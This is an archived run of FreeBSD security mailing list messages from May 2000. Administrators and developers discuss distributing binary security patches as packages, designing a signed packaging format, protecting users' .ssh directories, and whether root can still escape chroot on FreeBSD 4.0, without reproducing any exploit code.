(PDT) (envelope-from dwerthmu@ctg.albany.edu) Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Fri, 12 May 2000 15:44:15 -0400 Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F7703@ctg-nt.ctg.albany.edu> From: Derek Werthmuller To: 'Robert Watson' Cc: freebsd-security@FreeBSD.ORG Subject: RE: Applying patches with out a compiler Date: Fri, 12 May 2000 15:44:07 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This could really take the OS to a new level of management, ease of use and potentially increase its use in the industry(which I believe is a goal). The pkg_add utilities work great, why not expand an already successful component. As far as using it to update the version the OS to a new release than this would be a great next step. I know for me, in the past when I went from one version to the next I rebuilt the system, the source upgrade has been had its problems for me. Derek -----Original Message----- From: Robert Watson [mailto:rwatson@FreeBSD.ORG] Sent: Friday, May 12, 2000 12:40 PM To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler On Thu, 11 May 2000, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of FreeBSD with out > using a compiler in the system. I generaly don't advise leaving a working > compiler in say a firewall or a hardened system. I know that I can have a > seperate system that I can use to connect via CVS and use that to update the > hardened systems. But doesn't that just keep my sources up to date and I > still need to build/build world every so often? Is there another way to > apply the security related patches ? For patches where it's appropriate, I've been strongly considering releasing "packages" that update the key parts of the base OS for security fixes. This would be similar to the BSD/OS patch level support for fixes, although restricted only to security stuff. This would provide access to security fixes for non-source-centric sites, which I think is important. With 4.0 I haven't had the opportunity to exercise this possibility as yet. :-) I.e., pkg_add secpatch_4.0-RELEASE_001.tgz Would replace the faulty binaries with better ones, and leave behind a package install record so you could easily determine which security patches are installed. And if appropriate, could back up the original binaries allowing pkg_delete to restore the original state. Any thoughts on this? Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 13:17:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 9800C37C00F for ; Fri, 12 May 2000 13:16:48 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id PAA23209; Fri, 12 May 2000 15:16:45 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-86.max1.wa.cyberlynk.net(207.227.118.86) by peak.mountin.net via smap (V1.3) id sma023206; Fri May 12 15:16:38 2000 Message-Id: <4.3.2.20000511222552.00c38dd0@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Thu, 11 May 2000 22:42:41 -0500 To: stanislav shalunov From: "Jeffrey J. Mountin" Subject: Re: envy.vuurwerk.nl daily run output Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <87snvo8ovq.fsf@sharik.worldnet.att.net> References: <"Jeffrey J. Mountin"'s message of "Thu, 11 May 2000 20:10:41 -0500"> <20000509150609.L42267@vuurwerk.nl> <4.3.2.20000511192741.00c24ac0@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:48 PM 5/11/00 -0400, stanislav shalunov wrote: >"Jeffrey J. Mountin" writes: > > > You could always force the ownership of .ssh/ and any files under it > > to root. > >But the owner of the home directory can just "mv .ssh ssh-forget-me". >If the user already has an authorized_keys file, he'd probably notice. >Otherwise, especially if he doesn't ssh out from that machine or it >has a good known_hosts file it can go unnoticed. Whoops, forgot to add the flag so that it could not be deleted or removed. >Or did you mean "...and check that ownership didn't change daily"? >(They could move the directories around daily, too.) No. Without the flags set, that would just create more work and do little for security. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 13:26:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [198.7.192.5]) by hub.freebsd.org (Postfix) with SMTP id 4E9CF37B75B for ; Fri, 12 May 2000 13:26:16 -0700 (PDT) (envelope-from barrett@aye.net) Received: (qmail 25735 invoked by uid 1000); 12 May 2000 20:26:14 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 May 2000 20:26:14 -0000 Date: Fri, 12 May 2000 16:26:13 -0400 (EDT) From: Barrett Richardson To: Nazar Kulynych Cc: security@FreeBSD.ORG Subject: Re: high load In-Reply-To: <00051113444502.00773@ix.register.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Nazar Kulynych wrote: > when I do rm or tar -zxf the load gets upto 5.00 > on a pentium 200mmx with 48MB ram. > > I can't figure out what's going on > > Thanx in advance > > Lot and lots of file creation/deletion probably causes lots and lots of synchronous meta-data updates. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 13:51:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id EDF9737B595 for ; Fri, 12 May 2000 13:51:10 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA28061; Fri, 12 May 2000 13:50:32 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28059; Fri May 12 13:50:29 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id NAA63043; Fri, 12 May 2000 13:50:29 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdu63033; Fri May 12 13:49:45 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CKnjU42033; Fri, 12 May 2000 13:49:45 -0700 (PDT) Message-Id: <200005122049.e4CKnjU42033@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdG42029; Fri May 12 13:49:04 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: "Patrick Bihan-Faou" Cc: "Cy Schubert - ITSD Open Systems Group" , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Fri, 12 May 2000 11:46:41 EDT." <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 May 2000 13:49:04 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com>, "Patrick Bihan- Faou" writes: > Hi, > > > I was about to comment that anyone with root can break out of any > > chrooted environment including jail, however testing the break out of > > jail exploit (good thing I tested before I spoke), which BTW worked on > > FreeBSD-3 and numerous other platforms including Linux, Solaris, and > > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good > > thing! When did the FreeBSD chroot(2) get fixed? > > > > Once again FreeBSD leads the way. > > > > Following is the break-out-of-jail code. > > I just tested the exploit code on a 3.4 system and a 4.0 system and my > results are: > > - if I run the program as root, then programs runs properly: starts SH in / > - if I run the program as !root, then the program fails to chroot to back to > / (I guess this is the expected behaviour). > > > For info: > > The FreeBSD 3.x machine: > > FreeBSD jacuzzi.local.mindstep.com 3.4-STABLE FreeBSD 3.4-STABLE #8: Thu Apr > 27 00:13:41 EDT 2000 > patrick@jacuzzi.local.mindstep.com:/usr/src/sys/compile/JACUZZI i386 > > > The FreeBSD 4.0 machine: > > FreeBSD nitro 4.0-STABLE FreeBSD 4.0-STABLE #3: Fri Apr 21 15:10:09 EDT 2000 > patrick@nitro:/usr/src/sys/compile/NITRO i386 > > > So my question is: is the exploit really fixed ? Or is it normal for root to > be able to break loose from chroot ? I've been, as root, able to break out of jail with the posted code on FreeBSD-3.3, RH 5.2 & 6.0, Solaris 2.6, and Tru64-UNIX 4.0D. I've, as root, not been able to break out of jail on 4.0-STABLE as of April 22, hence suspected that FreeBSD plugged this hole. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 14: 0: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 8EF4C37B595; Fri, 12 May 2000 13:59:51 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA28107; Fri, 12 May 2000 13:59:32 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28103; Fri May 12 13:59:30 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id NAA63096; Fri, 12 May 2000 13:59:30 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY63094; Fri May 12 13:58:45 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CKwjt42087; Fri, 12 May 2000 13:58:45 -0700 (PDT) Message-Id: <200005122058.e4CKwjt42087@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdx42078; Fri May 12 13:57:50 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Robert Watson Cc: Igor Roshchin , David Pick , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Fri, 12 May 2000 15:00:47 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 May 2000 13:57:50 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Robe rt Watson writes: > My thoughts on dependencies, et al, have been: > > 1) Binary patches will only be available against the most recent -RELEASE > 2) Binary patch packages will depend on all prior binary patches being > installed > 3) Source patches use to build the binary patched version seem like a good > idea. You've got my vote. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 14: 6: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 5A70837B75B; Fri, 12 May 2000 14:05:50 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id PAA00327; Fri, 12 May 2000 15:05:29 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <391C725F.CF89DA4A@softweyr.com> Date: Fri, 12 May 2000 15:06:39 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: David Pick Cc: Robert Watson , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Pick wrote: > > > For patches where it's appropriate, I've been strongly considering > > releasing "packages" that update the key parts of the base OS for security > > fixes. This would be similar to the BSD/OS patch level support for fixes, > > although restricted only to security stuff. This would provide access to > > security fixes for non-source-centric sites, which I think is important. > > With 4.0 I haven't had the opportunity to exercise this possibility as > > yet. :-) > > > > I.e., > > > > pkg_add secpatch_4.0-RELEASE_001.tgz > > > > Would replace the faulty binaries with better ones, and leave behind a > > package install record so you could easily determine which security > > patches are installed. And if appropriate, could back up the original > > binaries allowing pkg_delete to restore the original state. > > > > Any thoughts on this? > > Very useful. > > A few points: > - We'd need to allow for USA/international versions, preferably with > different names. Perhaps a third "set" of names for the "patches" > that are independent of geography: > - secpatch_4.0-RELEASE_global-001 > - secpatch_4.0-RELEASE_international-001 > - secpatch_4.0-RELEASE_USAonly-001 Ugh. There's gotta be a better way. Please read below. > - The automatic dependency system would be magic, especially if there > was a "top level" package listing the latest "patches" Yeah, yeah, we could call them "Service Packs." Or not. > - possibly another "set" containing *source* patches for the kernel > only, for the sites who need to rebuild the kernel but carry no > other sources, to make the installation of these important patches > easier and hence more likely to happen > > A few questions: > - should each "patch" package have all the previous ones as dependencies? Only the ones this patch really depends on. > - most package names seem to use the convention of a basic name, a hyphen, > then the version number; does this really matter so the package names > would need to be modifiled slightly? I think the version numbers are part of the dependency magic, but haven't verified this. > - how sensitive can the system be made to the fact that different combinations > of distribution sets give defferent sets of binary programs: there's the > international/USA versions, but (as I've just realised), there's also > the issue of kerberos/non-kerberos versions of some binaries. Ick. I'd like to point out that Jordan is trying very very hard to solve these problems, and others, for real. Attempting to extend what we have now is probably not the best way to carry on. The project Jordan wishes to muster would address all the issues we've covered above, and others like what happens when the config file format changes between versions (automagically suck the settings out of the old one and put them into the new one is the RIGHT answer), and adding new entries into existing files, and ripping them back out when downgrading. If you're really interested in helping with the real effort, email jkh@freebsd.org and tell him you want to join the fun. He might even have an employment opportunity for you. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 14:18:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from orion.ac.hmc.edu (Orion.AC.HMC.Edu [134.173.32.20]) by hub.freebsd.org (Postfix) with ESMTP id 9880A37BA93 for ; Fri, 12 May 2000 14:18:38 -0700 (PDT) (envelope-from brdavis@orion.ac.hmc.edu) Received: (from brdavis@localhost) by orion.ac.hmc.edu (8.8.8/8.8.8) id OAA04296; Fri, 12 May 2000 14:18:24 -0700 (PDT) Date: Fri, 12 May 2000 14:18:24 -0700 From: Brooks Davis To: Cy Schubert - ITSD Open Systems Group Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000512141824.A748@orion.ac.hmc.edu> References: <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com> <200005122049.e4CKnjU42033@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre4i In-Reply-To: <200005122049.e4CKnjU42033@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Fri, May 12, 2000 at 01:49:04PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 12, 2000 at 01:49:04PM -0700, Cy Schubert - ITSD Open Systems Group wrote: > I've been, as root, able to break out of jail with the posted code on > FreeBSD-3.3, RH 5.2 & 6.0, Solaris 2.6, and Tru64-UNIX 4.0D. I've, as > root, not been able to break out of jail on 4.0-STABLE as of April 22, > hence suspected that FreeBSD plugged this hole. chroot != jail. chroot'ed programs are often described as running in jails, but they are certaintly in minimum security prisons at best. The new jail(8) feature in FreeBSD 4.0 write by PHK and documented by Robert Watson is an entierly different beast and it's certaintly what was suggested in the post that prompted this conversation. The very short introduction to jail is that it's a maximum secuirty version of chroot. It's almost as good as a whole seperate machine. -- Brooks -- Any statement of the form "X is the one, true Y" is FALSE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 15:18:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 0109C37B813; Fri, 12 May 2000 15:18:26 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id QAA00457; Fri, 12 May 2000 16:17:58 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <391C8366.C63B2B44@softweyr.com> Date: Fri, 12 May 2000 16:19:18 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brad Guillory Cc: Robert Watson , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler References: <200005121852.OAA89027@giganda.komkon.org> <20000512141525.F77275@baileylink.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brad Guillory wrote: > > I think that you have sound goals and achievable objectives, the ingredients > for a successful project. To accommodate the other camps (international > version users for instance) I suggest that you make any tools and methodologies > that you develop for the project available. Yes, this does sound like a workable plan, and is in fact exactly what I'm creating for DoBox. I'm certainly glad to share whatever code I write to support this, though the mechanisms may differ somewhat. > You might consider your dependency stance. It would probably be easier for > you to simply maintain a single package with incremental version numbers > where each version contains all the fixes. I suspect that the number of > binaries that will change over the course of a release will be minor. The pkg_add tool takes care of this to some extent. If the FreeBSD-4.0p3 package depends on FreeBSD-4.0p2 which in turn depends on FreeBSD-4.0p1 and you attempt to pkg_add p3, it will either fetch and apply p1 and p2 from the same media before installing p3 or fail to install p3 with a helpful warning that p2 is not installed. In the case of installing the patches over the networking, there should not be a reason why you could fetch p3 but not p2 or p1. > The usefulness of this project will probably be very limited if you do not > address the kernel issue. Many security fixes that I have seen since I joined > the list have been if the form of kernel patches. I suppose it would be enough to install the related kernel.GENERIC and updated kernel source files. We would probably want to a way to disregard the source file updates unless the sources are already installed on the system. As I said, these are EXACTLY the issues I am addressing for my employer, and am both happy to share (and commit) my code, and to receive design help. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 15:24:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id 26D0937BB25 for ; Fri, 12 May 2000 15:24:08 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 76832 invoked from network); 12 May 2000 22:24:06 -0000 Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 12 May 2000 22:24:06 -0000 Message-ID: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> From: "Patrick Bihan-Faou" To: References: Subject: New packaging tool (was Re: Applying patches with out a compiler) Date: Fri, 12 May 2000 18:23:15 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I am currently working on a new version of pkg_*, which will bring a few features that I feel are missing. In no special order these are: - better dependency checking - versioning of packages (not just the name of the tar file) - upgrades procedures from one version to the next - definition of "sets" of files - signature of files + verification using any of the supported hashes (MD4, MD5, SHA, RIPEMD) - support for "special" files and file permissions (devices, flags, etc.) - support for MTREE-like storage of directory hierarchies - installing from remote locations (i.e. on NFS mounted disks) while setting the "installed package" database properly for the remote machine. - support for file sets within the package (this can be used for supporting multiple architectures (alpha, i386) with one package) So far I have implemented the creation of the package tar file and support files with most of these feature. I also added enough smarts to update an existing package to the new format, so my changes are backward compatible. One thing that I want to include, but I can't find a way to preserver "tar compatibility" is self-signature of the package itself. I am debating whether this is important enough that tar compatibility can be dropped or not... I am also integrating this with the world build process so I can install many machines from a package. I am doing this for another project so this is my work these days, and you can expect something withing 2-3 weeks. If there is enough interest in the FreeBSD community, I would like to contribute it to the project. Otherwise, I will probably only make it available as a port. However considering the potential benefits for the community at large, I think it would be nice to have this as the "standard" packaging tool. I appreciate any comments/criticism on my work, so please don't by shy !!! Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 17: 6:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 3137637BD77 for ; Fri, 12 May 2000 17:06:23 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id SAA00693; Fri, 12 May 2000 18:06:03 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <391C9CBC.4E0ED8E5@softweyr.com> Date: Fri, 12 May 2000 18:07:24 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Patrick Bihan-Faou Cc: freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patrick Bihan-Faou wrote: > > Hi, > > I am currently working on a new version of pkg_*, which will bring a few > features that I feel are missing. Go back and read the message I wrote at the bottom of my first, big message on this subject, then talk to Jordan Hubbard before you get too deep into it. As I wrote before, it would be wasteful to do a lot of work on yet another new packaging system when it might be possible to build a foundation for what he wants in the future. In my opinion, if we're going to replace the packaging system completely, a good starting point might be to turn the PAX code, or something of that nature, into a library and build on top of that. The package-signing code I've produced uses the code already existing in OpenBSD 2.6, and places signatures between the gzip header and gzip compressed data. It's a clever use, and works quite well, because you only have to sign the compressed data, and don't have to worry about getting the gzip header or signature signed. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 18:37:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 137D237B834 for ; Fri, 12 May 2000 18:37:11 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id TAA19365; Fri, 12 May 2000 19:37:01 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id TAA09188; Fri, 12 May 2000 19:37:00 -0600 (MDT) (envelope-from nate) Date: Fri, 12 May 2000 19:37:00 -0600 (MDT) Message-Id: <200005130137.TAA09188@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Wes Peters Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <391C9CBC.4E0ED8E5@softweyr.com> References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > I am currently working on a new version of pkg_*, which will bring a few > > features that I feel are missing. > > In my opinion, if we're going to replace the packaging system completely, > a good starting point might be to turn the PAX code, or something of > that nature, into a library and build on top of that. Not PAX. ZIP, since PAX and tar both require you to read to the end of the file to determine the contents of the file, and don't allow you to do random access I/O and pull out individual files. There are numerous advantages to using something like ZIP, including removing the requirement to 'unpack' the archive in a staging area, since we could now unpack it directly in it's installation location. ZIP also allows signatures, and we have lots of free software that we can leverage to implement the tools with it. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 4:10:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id 405B437BC49 for ; Sat, 13 May 2000 04:10:49 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id TAA01730 for ; Sat, 13 May 2000 19:07:27 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id TAA13455; Sat, 13 May 2000 19:11:47 +0800 (+0800) (envelope-from robinson) Date: Sat, 13 May 2000 19:11:47 +0800 (+0800) From: Michael Robinson Message-Id: <200005131111.TAA13455@netrinsics.com> To: nate@yogotech.com Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) Cc: freebsd-security@freebsd.org In-Reply-To: <200005130137.TAA09188@nomad.yogotech.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: >There are numerous advantages to using something like ZIP, including >removing the requirement to 'unpack' the archive in a staging area, >since we could now unpack it directly in it's installation location. > >ZIP also allows signatures, and we have lots of free software that we >can leverage to implement the tools with it. Or, heck, why not JAR format, seeing as it's a well-defined standard, does everything necessary, and has multiple interoperable implementations. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 8: 0:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id DAC4737BB23 for ; Sat, 13 May 2000 08:00:21 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA03635; Sat, 13 May 2000 09:00:10 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <391D6E70.904FB463@softweyr.com> Date: Sat, 13 May 2000 09:02:08 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Nate Williams Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> <200005130137.TAA09188@nomad.yogotech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams wrote: > > > > I am currently working on a new version of pkg_*, which will bring a few > > > features that I feel are missing. > > > > In my opinion, if we're going to replace the packaging system completely, > > a good starting point might be to turn the PAX code, or something of > > that nature, into a library and build on top of that. > > Not PAX. ZIP, since PAX and tar both require you to read to the end of > the file to determine the contents of the file, and don't allow you to > do random access I/O and pull out individual files. > > There are numerous advantages to using something like ZIP, including > removing the requirement to 'unpack' the archive in a staging area, > since we could now unpack it directly in it's installation location. > > ZIP also allows signatures, and we have lots of free software that we > can leverage to implement the tools with it. Sounds great. So who wants to dive into libzip? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 8: 2:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id AE4CA37B944 for ; Sat, 13 May 2000 08:02:43 -0700 (PDT) (envelope-from 